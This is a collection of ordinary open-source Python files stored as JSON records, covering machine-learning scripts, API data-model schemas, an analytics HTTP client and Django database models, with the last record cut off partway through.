correct.cpu())\n # scheduler(epoch)\n\n # model.eval()\n # log.eval(len_dataset=len(dataset.test))\n\n # with torch.no_grad():\n # for batch in dataset.test:\n # inputs, targets = (b.to(device) for b in batch)\n\n # predictions = model(inputs)\n # loss = smooth_crossentropy(predictions, targets)\n # correct = 
torch.argmax(predictions, 1) == targets\n # log(model, loss.cpu(), correct.cpu())\n\n # log.flush()\n"} {"ext": "py", "sha": "1a3015f7dd34484d6ac908e0b92ea79ba988ef16", "content": "from im2mesh.onet_upconv2d_occtolocal import (\n config, generation, training, models\n)\n\n__all__ = [\n config, generation, training, models\n]\n"} {"ext": "py", "sha": "1a3016f34bfed9bf3b2e0f9512f111566e863fd2", "content": "# -*- coding: [stf-8 -*-\n\"\"\"\nContains the definition of all data models according to the Castor EDC API.\n\n@author: R.C.A. van Linschoten\nhttps://orcid.org/0000-0003-3052-596X\n\"\"\"\n\naudit_trail_model = {\n \"datetime\": [dict],\n \"event_type\": [str],\n \"user_id\": [str],\n \"user_name\": [str],\n \"user_email\": [str],\n \"event_details\": [dict, list],\n}\n\ncountry_model = {\n \"id\": [\n str,\n ],\n \"country_id\": [\n str,\n ],\n \"country_name\": [\n str,\n ],\n \"country_tld\": [\n str,\n ],\n \"country_cca2\": [\n str,\n ],\n \"country_cca3\": [\n str,\n ],\n}\n\nsingle_country_model = {\n \"id\": [\n int,\n ],\n \"country_id\": [\n int,\n ],\n \"country_name\": [\n str,\n ],\n \"country_tld\": [\n str,\n ],\n \"country_cca2\": [\n str,\n ],\n \"country_cca3\": [\n str,\n ],\n \"_links\": [\n dict,\n ],\n}\n\ndevice_token_model = {\n \"device_token\": [str],\n \"record_id\": [str],\n \"created_on\": [dict],\n \"updated_on\": [dict],\n}\n\nexport_data_model = {\n \"Study ID\": [\n str,\n ],\n \"Record ID\": [\n str,\n ],\n \"Form Type\": [\n str,\n ],\n \"Form Instance ID\": [\n str,\n ],\n \"Form Instance Name\": [\n str,\n ],\n \"Field ID\": [\n str,\n ],\n \"Value\": [\n str,\n ],\n \"Date\": [\n str,\n ],\n \"User ID\": [\n str,\n ],\n}\n\nexport_structure_model = {\n \"Study ID\": [\n str,\n ],\n \"Form Type\": [\n str,\n ],\n \"Form Collection ID\": [\n str,\n ],\n \"Form Collection Name\": [\n str,\n ],\n \"Form Collection Order\": [\n str,\n ], # Actually int in database, but csv interprets everything as string\n \"Form ID\": [\n str,\n ],\n \"Form Name\": [\n str,\n ],\n \"Form Order\": [\n str,\n ], # Actually int in database, but csv interprets everything as string\n \"Field ID\": [\n str,\n ],\n \"Field Variable Name\": [\n str,\n ],\n \"Field Label\": [\n str,\n ],\n \"Field Type\": [\n str,\n ],\n \"Field Order\": [\n str,\n ], # Actually int in database, but csv interprets everything as string\n \"Field Required\": [\n str,\n ], # Actually bool in database, but csv interprets everything as string\n \"Calculation Template\": [\n str,\n ],\n \"Field Option Group\": [\n str,\n ],\n}\n\nexport_option_group_model = {\n \"Study ID\": [\n str,\n ],\n \"Option Group Id\": [\n str,\n ],\n \"Option Group Name\": [\n str,\n ],\n \"Option Id\": [\n str,\n ],\n \"Option Name\": [\n str,\n ],\n \"Option Value\": [\n str,\n ],\n}\n\nrole_model = {\n \"name\": [str],\n \"description\": [str],\n \"permissions\": [dict],\n \"_links\": [dict],\n}\n\nstudy_data_point_model = {\n \"field_id\": [\n str,\n ],\n \"field_value\": [\n str,\n ],\n \"record_id\": [\n str,\n ],\n \"updated_on\": [str, type(None)],\n}\n\nstudy_data_point_extended_model = {\n \"record_id\": [\n str,\n ],\n \"field_variable_name\": [\n str,\n ],\n \"field_id\": [\n str,\n ],\n \"value\": [\n str,\n ],\n \"updated_on\": [str, type(None)],\n \"_embedded\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nstudy_step_model = {\n \"id\": [\n str,\n ],\n \"step_id\": [\n str,\n ],\n \"step_description\": [\n str,\n ],\n \"step_name\": [\n str,\n ],\n \"step_order\": [\n int,\n ],\n \"_embedded\": [\n 
dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nuser_model = {\n \"id\": [\n str,\n ],\n \"user_id\": [\n str,\n ],\n \"entity_id\": [\n str,\n ],\n \"full_name\": [\n str,\n ],\n \"name_first\": [str, type(None)],\n \"name_middle\": [str, type(None)],\n \"name_last\": [str, type(None)],\n \"email_address\": [\n str,\n ],\n \"institute\": [str, type(None)],\n \"department\": [str, type(None)],\n \"last_login\": [\n str,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nuser_study_model = {\n \"id\": [\n str,\n ],\n \"user_id\": [\n str,\n ],\n \"entity_id\": [\n str,\n ],\n \"full_name\": [\n str,\n ],\n \"name_first\": [str, type(None)],\n \"name_middle\": [str, type(None)],\n \"name_last\": [str, type(None)],\n \"email_address\": [\n str,\n ],\n \"institute\": [str, type(None)],\n \"department\": [str, type(None)],\n \"manage_permissions\": [dict],\n \"institute_permissions\": [list],\n \"last_login\": [\n str,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nstudy_model = {\n \"crf_id\": [\n str,\n ],\n \"study_id\": [\n str,\n ],\n \"name\": [\n str,\n ],\n \"created_by\": [\n str,\n ],\n \"created_on\": [\n str,\n ],\n \"live\": [\n bool,\n ],\n \"randomization_enabled\": [\n bool,\n ],\n \"gcp_enabled\": [\n bool,\n ],\n \"surveys_enabled\": [\n bool,\n ],\n \"premium_support_enabled\": [\n bool,\n ],\n \"main_contact\": [\n str,\n ],\n \"expected_centers\": [int, type(None)],\n \"duration\": [int, type(None)],\n \"expected_records\": [int, type(None)],\n \"slug\": [\n str,\n ],\n \"version\": [\n str,\n ],\n \"domain\": [\n str,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nreport_model = {\n \"id\": [\n str,\n ],\n \"report_id\": [\n str,\n ],\n \"description\": [\n str,\n ],\n \"name\": [\n str,\n ],\n \"type\": [\n str,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nreport_instance_model = {\n \"id\": [\n str,\n ],\n \"name\": [\n str,\n ],\n \"status\": [\n str,\n ],\n \"parent_id\": [\n str,\n ],\n \"parent_type\": [\n str,\n ],\n \"record_id\": [\n str,\n ],\n \"report_name\": [\n str,\n ],\n \"archived\": [\n bool,\n ],\n \"created_on\": [\n str,\n ],\n \"created_by\": [\n str,\n ],\n \"_embedded\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nreport_data_point_model = {\n \"field_id\": [\n str,\n ],\n \"report_instance_id\": [\n str,\n ],\n \"report_instance_name\": [\n str,\n ],\n \"field_value\": [\n str,\n ],\n \"record_id\": [\n str,\n ],\n \"updated_on\": [\n str,\n ],\n}\n\nreport_data_point_extended_model = {\n \"record_id\": [\n str,\n ],\n \"field_variable_name\": [\n str,\n ],\n \"field_id\": [\n str,\n ],\n \"value\": [\n str,\n ],\n \"updated_on\": [\n str,\n ],\n \"report_instance_id\": [\n str,\n ],\n \"_embedded\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nreport_step_model = {\n \"id\": [\n str,\n ],\n \"report_step_id\": [\n str,\n ],\n \"report_step_name\": [\n str,\n ],\n \"report_step_description\": [\n str,\n ],\n \"report_step_number\": [\n int,\n ],\n \"_links\": [\n dict,\n ],\n \"_embedded\": [\n dict,\n ],\n}\n\nsurvey_model = {\n \"id\": [\n str,\n ],\n \"survey_id\": [\n str,\n ],\n \"name\": [\n str,\n ],\n \"description\": [\n str,\n ],\n \"intro_text\": [\n str,\n ],\n \"outro_text\": [\n str,\n ],\n \"survey_steps\": [\n list,\n ],\n \"_links\": [\n dict,\n ],\n}\n\npackage_model = {\n \"id\": [\n str,\n ],\n \"allow_open_survey_link\": [bool],\n \"survey_package_id\": [\n str,\n ],\n \"name\": [\n str,\n ],\n \"description\": [\n str,\n ],\n \"intro_text\": [\n str,\n ],\n \"outro_text\": [\n str,\n ],\n \"sender_name\": [\n str,\n ],\n \"sender_email\": [\n 
str,\n ],\n \"auto_send\": [\n bool,\n ],\n \"allow_step_navigation\": [\n bool,\n ],\n \"show_step_navigator\": [\n bool,\n ],\n \"finish_url\": [\n str,\n ],\n \"auto_lock_on_finish\": [\n bool,\n ],\n \"default_invitation\": [\n str,\n ],\n \"default_invitation_subject\": [\n str,\n ],\n \"is_mobile\": [bool],\n \"expire_after_hours\": [int, type(None)],\n \"_embedded\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nsurvey_package_instance_model = {\n \"id\": [\n str,\n ],\n \"survey_package_instance_id\": [\n str,\n ],\n \"record_id\": [\n str,\n ],\n \"institute_id\": [\n str,\n ],\n \"institute_name\": [\n str,\n ],\n \"survey_package_id\": [\n str,\n ],\n \"survey_package_name\": [\n str,\n ],\n \"invitation_subject\": [\n str,\n ],\n \"invitation_content\": [\n str,\n ],\n \"created_on\": [\n dict,\n ],\n \"created_by\": [\n str,\n ],\n \"sent_on\": [dict, type(None)],\n \"first_opened_on\": [dict, type(None)],\n \"finished_on\": [dict, type(None)],\n \"available_from\": [dict],\n \"expire_on\": [str, type(None)],\n \"all_fields_filled_on\": [dict, type(None)],\n \"started_on\": [dict, type(None)],\n \"locked\": [\n bool,\n ],\n \"archived\": [\n bool,\n ],\n \"survey_url_string\": [\n str,\n ],\n \"progress\": [\n int,\n ],\n \"auto_lock_on_finish\": [\n bool,\n ],\n \"auto_send\": [\n bool,\n ],\n \"_embedded\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nsurvey_data_point_model = {\n \"field_id\": [\n str,\n ],\n \"survey_instance_id\": [\n str,\n ],\n \"survey_name\": [\n str,\n ],\n \"field_value\": [\n str,\n ],\n \"record_id\": [\n str,\n ],\n \"updated_on\": [\n str,\n ],\n}\n\nsurvey_package_data_point_model = {\n \"field_id\": [\n str,\n ],\n \"survey_instance_id\": [\n str,\n ],\n \"survey_name\": [\n str,\n ],\n \"field_value\": [\n str,\n ],\n \"record_id\": [\n str,\n ],\n \"updated_on\": [\n str,\n ],\n \"survey_package_id\": [\n str,\n ],\n}\n\nsurvey_data_point_extended_model = {\n \"record_id\": [\n str,\n ],\n \"field_variable_name\": [\n str,\n ],\n \"field_id\": [\n str,\n ],\n \"value\": [\n str,\n ],\n \"updated_on\": [\n str,\n ],\n \"survey_instance_id\": [\n str,\n ],\n \"_embedded\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nsurvey_step_model = {\n \"id\": [\n str,\n ],\n \"survey_step_id\": [\n str,\n ],\n \"survey_step_name\": [\n str,\n ],\n \"survey_step_description\": [\n str,\n ],\n \"survey_step_number\": [\n int,\n ],\n \"_embedded\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nfield_dep_model = {\n \"id\": [\n int,\n ],\n \"operator\": [\n str,\n ],\n \"value\": [\n str,\n ],\n \"parent_id\": [\n str,\n ],\n \"child_id\": [\n str,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nfield_model = {\n \"id\": [\n str,\n ],\n \"parent_id\": [\n str,\n ],\n \"field_id\": [\n str,\n ],\n \"field_number\": [\n int,\n ],\n \"field_label\": [\n str,\n ],\n \"field_variable_name\": [str, type(None)],\n \"field_enforce_decimals\": [bool, type(None)],\n \"field_type\": [\n str,\n ],\n \"field_required\": [\n int,\n ],\n \"field_hidden\": [\n int,\n ],\n \"field_info\": [\n str,\n ],\n \"field_units\": [\n str,\n ],\n \"field_min\": [\n int,\n float,\n type(None),\n ],\n \"field_min_label\": [\n str,\n type(None),\n ],\n \"field_max\": [\n int,\n float,\n type(None),\n ],\n \"field_max_label\": [\n str,\n type(None),\n ],\n \"field_summary_template\": [\n str,\n type(None),\n ],\n \"field_slider_step\": [\n str,\n int,\n type(None),\n ],\n \"report_id\": [\n str,\n ],\n \"field_length\": [\n int,\n type(None),\n ],\n \"additional_config\": [\n 
str,\n ],\n \"exclude_on_data_export\": [\n bool,\n ],\n \"option_group\": [\n dict,\n type(None),\n ],\n \"metadata_points\": [\n list,\n ],\n \"validations\": [\n list,\n ],\n \"dependency_parents\": [\n list,\n ],\n \"dependency_children\": [\n list,\n ],\n \"_links\": [\n dict,\n ],\n \"field_image\": [str, None],\n}\n\nfield_opt_model = {\n \"id\": [\n str,\n ],\n \"name\": [\n str,\n ],\n \"description\": [\n str,\n ],\n \"layout\": [\n bool,\n ],\n \"options\": [\n list,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nfield_val_model = {\n \"id\": [\n int,\n ],\n \"type\": [\n str,\n ],\n \"value\": [\n str,\n ],\n \"operator\": [\n str,\n ],\n \"text\": [\n str,\n ],\n \"field_id\": [\n str,\n ],\n \"_links\": [\n dict,\n ],\n}\n\ninstitute_model = {\n \"id\": [\n str,\n ],\n \"institute_id\": [\n str,\n ],\n \"name\": [\n str,\n ],\n \"abbreviation\": [\n str,\n ],\n \"code\": [str, type(None)],\n \"order\": [\n int,\n ],\n \"country_id\": [\n int,\n ],\n \"deleted\": [\n bool,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nmetadata_model = {\n \"id\": [\n str,\n ],\n \"metadata_type\": [\n dict,\n ],\n \"parent_id\": [str, type(None)],\n \"value\": [\n str,\n ],\n \"description\": [str, type(None)],\n \"element_type\": [\n str,\n ],\n \"element_id\": [str],\n \"_links\": [\n dict,\n ],\n}\n\nmetadata_type_model = {\n \"id\": [\n int,\n ],\n \"name\": [\n str,\n ],\n \"description\": [\n str,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nphase_model = {\n \"id\": [\n str,\n ],\n \"phase_id\": [\n str,\n ],\n \"phase_description\": [str, type(None)],\n \"phase_name\": [\n str,\n ],\n \"phase_duration\": [int, type(None)],\n \"phase_order\": [\n int,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nquery_model = {\n \"id\": [\n str,\n ],\n \"record_id\": [\n str,\n ],\n \"field_id\": [\n str,\n ],\n \"status\": [\n str,\n ],\n \"first_query_remark\": [\n str,\n ],\n \"created_by\": [\n str,\n ],\n \"created_on\": [\n dict,\n ],\n \"updated_by\": [\n str,\n ],\n \"updated_on\": [\n dict,\n ],\n \"_embedded\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nrandomization_model = {\n \"randomized_id\": [str, type(None)],\n \"randomization_group\": [str, type(None)],\n \"randomization_group_name\": [str, type(None)],\n \"randomized_on\": [dict, type(None)],\n \"_links\": [\n dict,\n ],\n}\n\n\nrecord_model = {\n \"id\": [\n str,\n ],\n \"record_id\": [\n str,\n ],\n \"_embedded\": [\n dict,\n ],\n \"ccr_patient_id\": [\n str,\n ],\n \"randomized_id\": [str, type(None)],\n \"randomization_group\": [str, type(None)],\n \"randomization_group_name\": [str, type(None)],\n \"randomized_on\": [dict, type(None)],\n \"last_opened_step\": [str, type(None)],\n \"progress\": [\n int,\n ],\n \"status\": [\n str,\n ],\n \"locked\": [bool],\n \"archived\": [\n bool,\n ],\n \"archived_reason\": [str, type(None)],\n \"created_by\": [\n str,\n ],\n \"created_on\": [\n dict,\n ],\n \"updated_by\": [\n str,\n ],\n \"updated_on\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nrecord_progress_model = {\n \"record_id\": [\n str,\n ],\n \"steps\": [\n list,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nsteps_model = {\n \"step_id\": [\n str,\n ],\n \"complete\": [\n int,\n ],\n \"sdv\": [\n bool,\n ],\n \"locked\": [\n bool,\n ],\n \"signed\": [\n bool,\n ],\n}\n\nstatistics_model = {\n \"study_id\": [\n str,\n ],\n \"records\": [\n dict,\n ],\n \"_links\": [\n dict,\n ],\n}\n\nstats_records_model = {\n \"total_count\": [\n int,\n ],\n \"institutes\": [\n list,\n ],\n}\n\nstats_institutes_model = {\n \"institute_id\": [\n str,\n ],\n 
\"institute_name\": [\n str,\n ],\n \"record_count\": [\n int,\n ],\n}\ndata_options = {\n \"numeric\": \"1\",\n \"date\": \"11-11-2017\",\n \"string\": \"testing\",\n \"dropdown\": \"1\",\n \"radio\": \"1\",\n \"textarea\": \"testing\",\n \"slider\": \"5\",\n \"checkbox\": \"1\",\n \"calculation\": \"5\",\n \"year\": \"2005\",\n}\n"} {"ext": "py", "sha": "1a301712abadc14d6a6b8fb81f0639cd1a1b4dd8", "content": "# https://www.kaggle.com/c/amazon-employee-access-challenge/forums/t/4838/python-code-to-achieve-0-90-auc-with-logistic-regression\n\n__author__ = 'Miroslaw Horbal'\n__email__ = 'miroslaw@gmail.com'\n__date__ = '14-06-2013'\n\nimport json\n\nimport pymongo as pymongo\nfrom numpy import array\nfrom sklearn import metrics, linear_model\nfrom sklearn.model_selection import train_test_split\nfrom scipy import sparse\nfrom itertools import combinations\n\nimport numpy as np\nimport pandas as pd\n\nSEED = 25\n\n\ndef group_data(data, degree=3, hash=hash):\n \"\"\" \n numpy.array -> numpy.array\n \n Groups all columns of data into all combinations of triples\n \"\"\"\n new_data = []\n m, n = data.shape\n for indicies in combinations(range(n), degree):\n new_data.append([hash(tuple(v)) for v in data[:, indicies]])\n return array(new_data).T\n\n\ndef OneHotEncoder(data, keymap=None):\n \"\"\"\n OneHotEncoder takes data matrix with categorical columns and\n converts it to a sparse binary matrix.\n\n Returns sparse binary matrix and keymap mapping categories to indicies.\n If a keymap is supplied on input it will be used instead of creating one\n and any categories appearing in the data that are not in the keymap are\n ignored\n \"\"\"\n if keymap is None:\n keymap = []\n for col in data.T:\n uniques = set(list(col))\n keymap.append(dict((key, i) for i, key in enumerate(uniques)))\n total_pts = data.shape[0]\n outdat = []\n for i, col in enumerate(data.T):\n km = keymap[i]\n num_labels = len(km)\n spmat = sparse.lil_matrix((total_pts, num_labels))\n for j, val in enumerate(col):\n if val in km:\n spmat[j, km[val]] = 1\n outdat.append(spmat)\n outdat = sparse.hstack(outdat).tocsr()\n return outdat, keymap\n\n\ndef create_test_submission(filename, prediction):\n content = []\n for i, p in enumerate(prediction):\n content.append({\n 'id': '%i' % (i + 1),\n 'ACTION': '%f' % p\n })\n f = open(filename, 'w')\n json.dump(content, f)\n f.close()\n print('Saved')\n\n\n# This loop essentially from Paul's starter code\ndef cv_loop(X, y, model, N):\n mean_auc = 0.\n for i in range(N):\n X_train, X_cv, y_train, y_cv = train_test_split(\n X, y, test_size=.20,\n random_state=i * SEED)\n model.fit(X_train, y_train)\n preds = model.predict_proba(X_cv)[:, 1]\n auc = metrics.roc_auc_score(y_cv, preds)\n print(\"AUC (fold %d/%d): %f\" % (i + 1, N, auc))\n mean_auc += auc\n return mean_auc / N\n\n\ndef main(user, password):\n print(\"Reading dataset...\")\n client = pymongo.MongoClient(\"mongodb://%s:%s@businessdb:27017\" % (user, password))\n train_data = pd.read_json(json.dumps(list(client.test.train.find({}, {'_id': 0}))), orient='records')\n test_data = pd.read_json(json.dumps(list(client.test.test.find({}, {'_id': 0}))), orient='records')\n all_data = np.vstack((train_data.iloc[:, 1:], test_data.iloc[:, :]))\n\n num_train = np.shape(train_data)[0]\n\n # Transform data\n print(\"Transforming data...\")\n dp = group_data(all_data, degree=2)\n dt = group_data(all_data, degree=3)\n\n y = array(train_data.iloc[:, 0])\n X = all_data[:num_train]\n X_2 = dp[:num_train]\n X_3 = dt[:num_train]\n\n X_test = 
all_data[num_train:]\n X_test_2 = dp[num_train:]\n X_test_3 = dt[num_train:]\n\n X_train_all = np.hstack((X, X_2, X_3))\n X_test_all = np.hstack((X_test, X_test_2, X_test_3))\n num_features = X_train_all.shape[1]\n\n model = linear_model.LogisticRegression()\n\n # Xts holds one hot encodings for each individual feature in memory\n # speeding up feature selection \n Xts = [OneHotEncoder(X_train_all[:, [i]])[0] for i in range(num_features)]\n\n print(\"Performing greedy feature selection...\")\n score_hist = []\n N = 10\n good_features = set([])\n # Greedy feature selection loop\n while len(score_hist) < 2 or score_hist[-1][0] > score_hist[-2][0]:\n scores = []\n for f in range(len(Xts)):\n if f not in good_features:\n feats = list(good_features) + [f]\n Xt = sparse.hstack([Xts[j] for j in feats]).tocsr()\n score = cv_loop(Xt, y, model, N)\n scores.append((score, f))\n print(\"Feature: %i Mean AUC: %f\" % (f, score))\n good_features.add(sorted(scores)[-1][1])\n score_hist.append(sorted(scores)[-1])\n print(\"Current features: %s\" % sorted(list(good_features)))\n\n # Remove last added feature from good_features\n good_features.remove(score_hist[-1][1])\n good_features = sorted(list(good_features))\n print(\"Selected features %s\" % good_features)\n\n print(\"Performing hyperparameter selection...\")\n # Hyperparameter selection loop\n score_hist = []\n Xt = sparse.hstack([Xts[j] for j in good_features]).tocsr()\n Cvals = np.logspace(-4, 4, 15, base=2)\n for C in Cvals:\n model.C = C\n score = cv_loop(Xt, y, model, N)\n score_hist.append((score, C))\n print(\"C: %f Mean AUC: %f\" % (C, score))\n bestC = sorted(score_hist)[-1][1]\n print(\"Best C value: %f\" % (bestC))\n\n print(\"Performing One Hot Encoding on entire dataset...\")\n Xt = np.vstack((X_train_all[:, good_features], X_test_all[:, good_features]))\n Xt, keymap = OneHotEncoder(Xt)\n X_train = Xt[:num_train]\n X_test = Xt[num_train:]\n\n print(\"Training full model...\")\n model.fit(X_train, y)\n\n print(\"Making prediction and saving results...\")\n preds = model.predict_proba(X_test)[:, 1]\n create_test_submission('results.json', preds)\n\n\nif __name__ == \"__main__\":\n main('admin', 'toor')\n"} {"ext": "py", "sha": "1a3017e2047958a83cbc36b3be7ad231abdacfc8", "content": "import json\nimport logging\nfrom datetime import date, datetime\nfrom gzip import GzipFile\nfrom io import BytesIO\nfrom typing import Any, Optional, Union\n\nimport requests\nfrom dateutil.tz import tzutc\n\nfrom posthog.utils import remove_trailing_slash\nfrom posthog.version import VERSION\n\n_session = requests.sessions.Session()\n\nDEFAULT_HOST = \"https://app.posthog.com\"\nUSER_AGENT = \"posthog-python/\" + VERSION\n\n\ndef post(\n api_key: str, host: Optional[str] = None, path=None, gzip: bool = False, timeout: int = 15, **kwargs\n) -> requests.Response:\n \"\"\"Post the `kwargs` to the API\"\"\"\n log = logging.getLogger(\"posthog\")\n body = kwargs\n body[\"sentAt\"] = datetime.utcnow().replace(tzinfo=tzutc()).isoformat()\n url = remove_trailing_slash(host or DEFAULT_HOST) + path\n body[\"api_key\"] = api_key\n data = json.dumps(body, cls=DatetimeSerializer)\n log.debug(\"making request: %s\", data)\n headers = {\"Content-Type\": \"application/json\", \"User-Agent\": USER_AGENT}\n if gzip:\n headers[\"Content-Encoding\"] = \"gzip\"\n buf = BytesIO()\n with GzipFile(fileobj=buf, mode=\"w\") as gz:\n # 'data' was produced by json.dumps(),\n # whose default encoding is utf-8.\n gz.write(data.encode(\"utf-8\"))\n data = buf.getvalue()\n\n res = 
_session.post(url, data=data, headers=headers, timeout=timeout)\n\n if res.status_code == 200:\n log.debug(\"data uploaded successfully\")\n\n return res\n\n\ndef _process_response(\n res: requests.Response, success_message: str, *, return_json: bool = True\n) -> Union[requests.Response, Any]:\n log = logging.getLogger(\"posthog\")\n if not res:\n raise APIError(\n \"N/A\",\n \"Error when fetching PostHog API, please make sure you are using your public project token/key and not a private API key.\",\n )\n if res.status_code == 200:\n log.debug(success_message)\n return res.json() if return_json else res\n try:\n payload = res.json()\n log.debug(\"received response: %s\", payload)\n raise APIError(res.status_code, payload[\"detail\"])\n except ValueError:\n raise APIError(res.status_code, res.text)\n\n\ndef decide(api_key: str, host: Optional[str] = None, gzip: bool = False, timeout: int = 15, **kwargs) -> Any:\n \"\"\"Post the `kwargs to the decide API endpoint\"\"\"\n res = post(api_key, host, \"/decide/\", gzip, timeout, **kwargs)\n return _process_response(res, success_message=\"Feature flags decided successfully\")\n\n\ndef batch_post(\n api_key: str, host: Optional[str] = None, gzip: bool = False, timeout: int = 15, **kwargs\n) -> requests.Response:\n \"\"\"Post the `kwargs` to the batch API endpoint for events\"\"\"\n res = post(api_key, host, \"/batch/\", gzip, timeout, **kwargs)\n return _process_response(res, success_message=\"data uploaded successfully\", return_json=False)\n\n\ndef get(api_key: str, url: str, host: Optional[str] = None, timeout: Optional[int] = None) -> requests.Response:\n url = remove_trailing_slash(host or DEFAULT_HOST) + url\n res = requests.get(url, headers={\"Authorization\": \"Bearer %s\" % api_key, \"User-Agent\": USER_AGENT}, timeout=timeout)\n return _process_response(res, success_message=f\"GET {url} completed successfully\")\n\ndef shutdown():\n # Avoid logs with\n # sys:1: ResourceWarning: unclosed\n # \n # Should only be called when once, renders `_session` unusable\n _session.close()\n\nclass APIError(Exception):\n def __init__(self, status: Union[int, str], message: str):\n self.message = message\n self.status = status\n\n def __str__(self):\n msg = \"[PostHog] {0} ({1})\"\n return msg.format(self.message, self.status)\n\n\nclass DatetimeSerializer(json.JSONEncoder):\n def default(self, obj: Any):\n if isinstance(obj, (date, datetime)):\n return obj.isoformat()\n\n return json.JSONEncoder.default(self, obj)\n"} {"ext": "py", "sha": "1a3018eed7af9ecef4b593a07d12b4af7aa6c7f3", "content": "'''Tools for sensitivity analyses. I still need to read Lash & Fox to integrate more tools\nfor multiple bias analysis. This branch is still very much a work in progress. 
The goal is \nto simplify sensitivity analyses, in the hopes they become more common in publications\n\n-MonteCarloRR(): generates a corrected RR distribution based on binary confounder\n-trapezoidal(): generates a trapezoidal distribution of values\n'''\n\n\nfrom .Simple import MonteCarloRR\nfrom .distributions import trapezoidal\n"} {"ext": "py", "sha": "1a30197dc12d598d0dc6eeec07243d5c3a4e332a", "content": "from itertools import chain\n\nfrom Model.point import Point\n\nfrom View.itempriorities import ItemPriorities\n\nclass Cell:\n\tdef __init__ (self, pt):\n\t\tassert isinstance (pt, Point)\n\t\tself.pt = pt\n\t\t#self.neighbors = {}\n\t\t#self.items = {} # including walls and players\n\t\tself.players = []\n\t\tself.walls = [] # seems like too many walls\n\t\tself.items = []\n\t\t# TODO add floor and ceiling, so you can break through it\n\t#def setNeighbor (self, direction, cell):\n\t#\tself.neighbors[direction] = cell\n\tdef isTraversable (self):\n\t\tif len (filter (\n\t\t\tlambda (item): not item.isTraversable (),\n\t\t\tchain (self.players, self.walls, self.items))) is 0:\n\t\t\treturn True\n\t\treturn False\n\t\"\"\"\n\tdef getItemsOfType (self, T):\n\t\treturn chain.from_iterable (map (\n\t\t\tlambda (key): self.items.get (key),\n\t\t\tfilter (lambda (t): isinstance (t, T), self.items.keySet ())))\n\tdef getItems (self): return chain.from_iterable (self.items.values ())\n\t\"\"\"\n\t\n\tdef __repr__ (self):\n\t\tif len (self.itemViews) is 0: return '.'\n\t\treturn repr (self.items.values ())\n\tdef __str__ (self):\n\t\t#if len (self.items) is 0: return '.'\n\t\t#for priority in [Wall] + itemPriorities + [Item]:\n\t\t#\titems = filter (\n\t\t#\t\tlambda (item): isinstance (item, priority),\n\t\t#\t\tself.items)\n\t\t#\tif len (items) is 0: continue\n\t\t#\treturn str (items[0]) # some are not displayed\n\t\t#raise Exception (self.items)\n\t\t\n\t\tc = chain (self.players, self.walls, self.items)\n\t\treturn str (next (c, '.'))\n\t\t\n\tdef addPlayer (self, player):\n\t\tassert self.isTraversable ()\n\t\tassert self.pt == player.pt\n\t\tself.players.append (player)\n\tdef removePlayer (self, player):\n\t\tassert self.pt == player.pt\n\t\tassert player in self.players\n\t\tself.players.remove (player)\n\tdef containsPlayer (self, player):\n\t\tassert self.pt == player.pt\n\t\treturn player in self.players"} {"ext": "py", "sha": "1a30198251afc1ca2d19648163f92962b918a14d", "content": "# This is an auto-generated Django model module.\n# You'll have to do the following manually to clean this up:\n# * Rearrange models' order\n# * Make sure each model has one field with primary_key=True\n# * Make sure each ForeignKey and OneToOneField has `on_delete` set to the desired behavior\n# * Remove `managed = False` lines if you wish to allow Django to create, modify, and delete the table\n# Feel free to rename the models, but don't rename db_table values or field names.\nfrom django.db import models\n\n\nclass Address(models.Model):\n address_id = models.AutoField(primary_key=True)\n state = models.CharField(max_length=50)\n city = models.CharField(max_length=50)\n street = models.CharField(max_length=50)\n house_number = models.IntegerField()\n postal_code = models.IntegerField()\n\n class Meta:\n managed = False\n db_table = 'address'\n\n def __str__(self):\n return f\"{self.state}, {self.city}, {self.street}, {self.house_number}, {self.postal_code}\"\n\n\nclass Contact(models.Model):\n contact_id = models.AutoField(primary_key=True)\n person = models.ForeignKey('Person', models.DO_NOTHING)\n 
contact_type = models.CharField(max_length=20)\n value = models.CharField(max_length=50)\n last_change = models.DateTimeField(blank=True, null=True)\n\n class Meta:\n managed = False\n db_table = 'contact'\n\n def __str__(self):\n return f\"{self.contact_type}, {self.value}\"\n\n def getType(self):\n return self.contact_type\n\n def getValue(self):\n return self.value\n\n\nclass Department(models.Model):\n department_id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=50)\n decription = models.CharField(max_length=255, blank=True, null=True)\n\n class Meta:\n managed = False\n db_table = 'department'\n\n def getAll():\n return [str(qSet.name) for qSet in Department.objects.all()]\n\nclass DepartmentHasPerson(models.Model):\n department = models.ForeignKey(Department, models.DO_NOTHING)\n person = models.ForeignKey('Person', on_delete=models.CASCADE)\n\n class Meta:\n managed = False\n db_table = 'department_has_person'\n\n\nclass DepartmentHasProgram(models.Model):\n department = models.ForeignKey(Department, models.DO_NOTHING)\n program = models.ForeignKey('StudyProgram', models.DO_NOTHING)\n\n class Meta:\n managed = False\n db_table = 'department_has_program'\n\n\nclass Faculty(models.Model):\n faculty_id = models.AutoField(primary_key=True)\n name = models.CharField(max_length=50)\n address = models.ForeignKey(Address, models.DO_NOTHING)\n\n class Meta:\n managed = False\n db_table = 'faculty'\n\n def getAll():\n return [str(qSet.name) for qSet in Faculty.objects.all()]\n\n\nclass FacultyHasDepartment(models.Model):\n faculty = models.ForeignKey(Faculty, models.DO_NOTHING)\n department = models.ForeignKey(Department, models.DO_NOTHING)\n\n class Meta:\n managed = False\n db_table = 'faculty_has_department'\n\n\nclass 